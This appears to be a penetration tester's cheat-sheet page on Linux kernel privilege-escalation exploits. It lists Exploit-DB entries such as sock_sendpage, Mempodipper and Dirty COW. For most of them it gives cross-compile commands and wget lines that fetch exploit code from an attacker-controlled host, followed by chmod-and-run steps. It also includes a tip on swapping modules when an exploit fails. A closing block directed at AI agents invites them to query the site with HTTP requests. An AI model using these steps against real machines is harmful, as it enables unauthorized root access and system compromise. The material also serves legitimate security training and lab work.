# Kernel Exploits

### \*\*Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip\_append\_data()' Ring0 Privilege Escalation (1) - \*\*

<https://www.exploit-db.com/exploits/9542>

If target machine has 32-bit architecture, we compile it with cross compiling at our machine.

```
$ gcc -m32 -Wl,--hash-style=both -o 9542 9542.c

$ wget http://192.168.1.1/9545 && chmod +x 9542 && ./9542
```

### Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock\_sendpage()' Local Privilege Escalation

<https://www.exploit-db.com/exploits/9545>

If this doesn't work, we should change the module. - <https://bugzilla.redhat.com/show\\_bug.cgi?id=516949#c24-> List of Modules - 24

Line 349 - if ((out\_fd = socket(**{MODULENAME}**, SOCK\_DGRAM, 0)) == -1)

```
gcc -m32 -Wl,--hash-style=both 9545.c -o 9545

wget http://192.168.1.1/9545 && chmod +x 9545 && ./9545
```

```
linux-sendpage.c (same 9545)
 * Linux kernel versions from 2.4.4 to 2.4.37.4, and from 2.6.0 to 2.6.30.4
 * are vulnerable.
 * For i386 and ppc, compile with the following command:
 * gcc -Wall -o linux-sendpage linux-sendpage.c
 *
 * And for x86_64 and ppc64:
 * gcc -Wall -m64 -o linux-sendpage linux-sendpage.c
```

### Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2)

exploits/linux/local/35161.c

<https://www.exploit-db.com/raw/35161>

```
mkdir /tmp/poc
cd /tmp/poc
wget http://192.168.1.1/35161.c
gcc 35161.c -o poc
./poc
```

### Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation

<https://www.exploit-db.com/exploits/44298>

```
cp /usr/share/exploitdb/exploits/linux/local/44298.c .
gcc 44298.c -o exploit.php

wget http://192.168.1.1:8080/exploit.php
mv exploit.php exploit
chmod +x exploit
./exploit
```

### Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation

<https://www.exploit-db.com/exploits/45010>

```
gcc cve-2017-16995.c -o cve-2017-16995
$ ./cve-2017-16995
```

### Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE\_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)

<https://www.exploit-db.com/exploits/40839>

<https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c>

```
test$ gcc -pthread dirty.c -o dirty -lcrypt dirty
./dirty
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://cel1s0.gitbook.io/offsec-notes/readme/linux-unix/checklist-privesc/kernel-exploits.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.